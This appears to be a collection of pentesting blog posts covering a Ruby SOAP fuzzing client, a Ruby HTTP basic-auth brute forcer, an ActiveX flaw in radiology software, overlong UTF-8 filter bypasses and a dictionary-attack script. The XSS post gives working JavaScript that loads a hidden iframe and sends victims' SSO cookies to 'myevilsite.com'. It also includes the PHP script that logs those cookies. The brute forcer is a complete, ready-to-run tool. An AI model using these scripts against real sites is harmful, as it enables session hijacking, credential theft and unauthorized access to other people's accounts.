Ruby SOAP client with basic authentication and client certificate

During these days I had the need to do a pentest to a web service but since wsfuzzer wasn't working correctly I had to write my own ruby soap client that was able to connect to a ssl protected web service with client certificate and basic authentication.
After many hours spent looking for the suitable library, I've decided to use savon with ruby 1.8.7 (DON'T USE RUBY 1.9.1, it won't work).
First I had to convert 1 p12 certificate into 2 pem:

openssl pkcs12 -in global.p12 -out global.pem

Then we cut the private key part from global pem and copy it into protected_key.pem
and issue the command:
(you gotta provide the password of your private key)

mv global.pem cert.pem

openssl rsa -in protected_key.pem -out key.pem

The we can finally write the ruby code:

require 'rubygems'

require 'savon'

client = Savon::Client.new "https://example.com/services?wsdl" client.request.http.ssl_client_auth(

:cert = OpenSSL::X509::Certificate.new(File.read("cert.pem")),
:key = OpenSSL::PKey::RSA.new(File.read("key.pem")),

:verify_mode => OpenSSL::SSL::VERIFY_NONE )

#BASIC AUTHENTICATION

client.request.basic_auth "User", "Password"

puts client.wsdl.soap_actions

#puts client.wsdl.namespace_uri

#don't forget @inorder otherwise the client will send you key values in a different sequence different from #the one you wrote down

response = client.add_customer do |soap|

soap.body = {

:id =111,

:tel =1233,

:issuer =asder,

:payment_mode =1,

:alias =asd,

:@inorder = [:id, :tel, :issuer, :payment_mode, :alias] }

end

puts response.to_xml

Finally you have to add some permutation to your values to make it a real soap fuzzer. You can start by getting the file all_attacks.txt used by from WSFuzzer

How to steal cross domain cookies via double XSS

During a pentest to a big company using SSO (single-sign-on) system I found a stored xss in one of their site, call it "a.com". This site unfortunately doesn't partecipate in the SSO login system, so I had to devise a way to use it to steal the cookies from one of the SSO domains. After some tests I found that "b.com" (one of the SSO domains) was vulnerable to reflected xss, so by injecting an iframe in a.com that as a source was calling the vulnerable "b.com" url that in turn was loading an image that as a source was calling my server I managed to steal sso authenticated cookies. Let's see some code: (the code is taking advantage of jquery.js since it was originally loaded by a.com) The following code is an external js injected in the stored xss vulnerable parameter in "a.com"

$(document).ready(function() {
var el = document.createElement("iframe");
el.setAttribute('id', 'ifrm');
el.setAttribute('heigth', '0');
el.setAttribute('width', '0');
el.style.visibility="hidden";
document.body.appendChild(el);
url="http://www.b.com/index.php?query=%22%3CSCRIPT/SRC=http://myevilsite.com/Cookie_Stealer/ex.js?";
el.setAttribute('src', url);

});

where ex.js is:

var Image = document.createElement("img");
Image.setAttribute("width","30");
Image.src="http://myevilsite.com/Cookie_Stealer/stealer.php?c="+encodeURI(document.cookie)+"&location="+document.location;

and stealer.php code is:

<?php
$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a")
or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
?>

Finally by visiting a.com while being logged to any of the SSO domains causes your credentials being sent to my server

Using REXML for parsing XSS Cheat Sheet

A small ruby snippets for parsing Xss cheat sheet at http://ha.ckers.org/xssAttacks.xml

#Coded by cl@rity533k@
#!/usr/bin/ruby
require 'rexml/document'
include REXML
if ARGV.length < 1 
     $stderr.puts("Usage: #{File.basename($0)} ")
exit
end

if File.file?("#{ARGV[0]}") == false then
$stderr.puts("ERROR: xml file not found: #{ARGV[0]}.")
exit
end

file = File.new("#{ARGV[0]}")
Prod_array = Array.new
doc = Document.new(file)
root = doc.root


for prt in root.elements.to_a("//attack/code")
p prt.text 
end

0-day ActiveX on Radiology Software

Hi everyone again!!
I'd like to report an undisclosed vulnerability I found in a very commonly used Radiology Software during a pentest in a Hospital.

Technical details:

To work propery the application installs a cab file called prjkillhome.cab containing our ActiveX control.
Using ComRaider we can see that this control uses a potentially noxious function called OpenShell.


By creating an html document that invokes it it's been possible to exploit it to run arbitrary code on the victim machine.
Following is a PoC that spawn calc.exe

Ruby Brute Forcer for Basic Authentication

Hi everyone since I've just started my coding in ruby, I'd like to give the Hacking community a small contribution. Here's a ruby script that given two files it attempts to brute force basic authentication login, like those of lotus notes or apache.

#!/bin/ruby
require 'net/http'
require 'timeout'

print ("

Basic Auth Bruteforcer
----------------------------
Usage: #{File.basename($0)} url uri 


")
if ARGV.length < 2
    $stderr.puts("Usage: #{File.basename($0)}  ")
    exit
end

url = "#{ARGV[0]}"
p url
uri = "#{ARGV[1]}"
p uri
username = IO.readlines("user.txt")
password = IO.readlines("password.txt")
resp = href = "";
begin
http = Net::HTTP.new(url, 80)
   #http.use_ssl = true
 username.each do |user|
  password.each do |pass|
  p "trying  #{user.chomp} with password #{pass.chomp}"
   Timeout::timeout(3) do
   http.start do |http|
   req = Net::HTTP::Get.new(uri, {"User-Agent" => "wget"})
   req.basic_auth(user.chomp, pass.chomp)
   response = http.request(req)
    case response
     when Net::HTTPOK
      p resp = response.body
     when Net::HTTPUnauthorized
      p 'Unauthorized'
     else 
      p 'error'
    end
   end
   end
  end
 end
 rescue
  $stderr.print "Connection Failed: " + $! + "\n"
 rescue Timeout::Error
  p "Problem Connecting"

end

Overly long UTF-8 encoding explained by a non byte eater

Hello everyone, after reading the recent unicode attack vs SiteMinder, I've decided to write a dumb proof explanation of how the overly long UTF-8 encoding works since I couldn't find a good one. To do this we need to know the rules for representing a valid utf-8 octet sequence, a table to help us find the ASCII equivalent char and some binary notions.

• The rules can be found at: http://www.ietf.org/rfc/rfc2279.txt?number=2279 (1)
• The table can be found at: http://www.utf8-chartable.de/unicode-utf8-table.pl (2)

From (1)

UTF-8 definition

In UTF-8, characters are encoded using sequences of 1 to 6 octets.
The only octet of a "sequence" of one has the higher-order bit set to
0, the remaining 7 bits being used to encode the character value. In
a sequence of n octets, n>1, the initial octet has the n higher-order
bits set to 1, followed by a bit set to 0.  The remaining bit(s) of
that octet contain bits from the value of the character to be
encoded.  The following octet(s) all have the higher-order bit set to
1 and the following bit set to 0, leaving 6 bits in each to contain
bits from the character to be encoded.

The table below summarizes the format of these different octet types.
The letter x indicates bits available for encoding bits of the UCS-4
character value.



Yergeau                     Standards Track                     [Page 3]

RFC 2279                         UTF-8                      January 1998

UCS-4 range (hex.)        UTF-8 octet sequence (binary)
0000 0000-0000 007F       0xxxxxxx
0000 0080-0000 07FF       110xxxxx 10xxxxxx
0000 0800-0000 FFFF       1110xxxx 10xxxxxx 10xxxxxx
0001 0000-001F FFFF       11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
0020 0000-03FF FFFF       111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
0400 0000-7FFF FFFF       1111110x 10xxxxxx ... 10xxxxxx

Encoding from UCS-4 to UTF-8 proceeds as follows:

1) Determine the number of octets required from the character value
and the first column of the table above.  It is important to note
that the rows of the table are mutually exclusive, i.e. there is
only one valid way to encode a given UCS-4 character.

2) Prepare the high-order bits of the octets as per the second column
of the table.

3) Fill in the bits marked x from the bits of the character value,
starting from the lower-order bits of the character value and
putting them first in the last octet of the sequence, then the
next to last, etc. until all x bits are filled in.

The algorithm for encoding UCS-2 (or Unicode) to UTF-8 can be
obtained from the above, in principle, by simply extending each
UCS-2 character with two zero-valued octets.  However, pairs of
UCS-2 values between D800 and DFFF (surrogate pairs in Unicode
parlance), being actually UCS-4 characters transformed through
UTF-16, need special treatment: the UTF-16 transformation must be
undone, yielding a UCS-4 character that is then transformed as
above.

Let's now explain how to create different UTF-8 representations of the same char following the afore mentioned rules. Let's take for example the "<" (less than sign.). If we look at the table (2) we'll see that the HEX encoding for "<" is:

ASCII	HEX	BINARY
<	%3C	00111100

If we look at the binary representation we can see that is perfectly valid as it follows the pattern: 0xxxxxxx but what if we would like to use two octets (overly long representation) to encode 00111100 (our less than sign)? To do so let's split it in 2 chunks of 6 and 2 elements: 00 111100 and let's start by substituting the x's with our two chunks, from low order to high order bits ( right to left ) and padding the remaining bits with 0's.

	1st octet	2nd octet
	110xxxxx	10xxxxxx
BINARY	11000000	10111100
HEX	%C0	%BC

Now analogously if we want to use a three octects encoding we have:

	1st octet	2nd octet	3rd octet
	1110xxxx	10xxxxxx	10xxxxxx
BINARY	11100000	10000000	10111100
HEX	%E0	%80	%BC

Thanks to these encodings the guy at: http://i8jesus.com/?p=55 managed to bypass SiteMinder filters. A great thank to my colleague daigoro for helping me in understanding this subject better.

Chickenfoot dictionary attack

Hello everyone... This time we'll learn how to write a very cool script using a superset of javascript functions. This is achieved through a firefox extension called chickenfoot that you can install from here. The script will automate the filling of username and password given two different files. If you receive an error its probably because the script doesn't find the fileio.js file. In this case you can find it on your system , open it and copy the content before my script begins. Credits also go to my friend "Daigoro"